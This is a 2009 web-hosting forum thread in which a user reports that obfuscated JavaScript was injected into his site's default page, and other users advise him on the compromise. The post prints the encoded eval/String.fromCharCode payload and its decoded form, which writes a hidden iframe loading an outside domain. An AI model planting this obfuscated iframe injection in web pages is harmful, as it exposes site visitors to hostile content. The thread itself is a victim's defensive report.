Wierd code injected into default page

Discussion in 'Getting started' started by scot, Jun 3, 2009.

Thread Status:
Threads that have been inactive for 5 years or longer are closed to further replies. Please start a new thread.
  1. scot

    scot

    After opening my new DASP account last week I replaced the default index.htm page with a very simple html page that only had my domain name centered on the page.

    Several days later I noticed a javascript error whenever I loaded the page. When I looked at the source for my new index.htm page there was a mysterious javascript function in the body.

    The script was encoded as ascii character codes as follows:

    Code:
    <scripttype="text/javascript">eval(String.fromCharCode
(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,
104,103,52,53,61,34,107,97,114,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,
97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,
97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,
99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,
114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,
43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,
116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,
39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,
52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,
32,109,110,98,113,61,52,51,48,52,49,56,50,52))
</script>
    I decoded the ascii stream and it looks like this:

    Code:
    var jhqw=1231113+25;var ghg45="kar";var w="last";var re6=".";var h2h="com";var a="ifr";var s="htt";
document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'r'+'ame>');
function gg6345(){var as3113=9+7544;} var mnbq=43041824
    Basically it is trying to redirect the browser to a site called "karlast.com". I tried to navigate to the page but it doesn't exist anymore. Most likely a rogue site that has been taken down.

    How could this script have gotten into my default page? I have scanned my system for virus/malware and it is clean. No one else has access to my account (at least no one is supposed to have access!).

    Thanks, Scott.
     
    scot, Jun 3, 2009
    #1
  2. mjp

    mjp

    Scott, you may want to read this post. Unfortunately this kind of compromise is becoming more common.
     
    mjp, Jun 3, 2009
    #2
  3. Bruce

    Bruce DiscountASP.NET Staff

    create a support ticket, we'll give you further instructions.
     
    Bruce, Jun 3, 2009
    #3
  4. scot

    scot

    I saw that post, but after scanning my system with 3 different spyware utilities I figured it couldn't be spyware. I'll change my password anyway.

    Thanks mjp.

    Bruce - just saw your post. Will do.
     
    scot, Jun 3, 2009
    #4
Thread Status:
Threads that have been inactive for 5 years or longer are closed to further replies. Please start a new thread.

Share This Page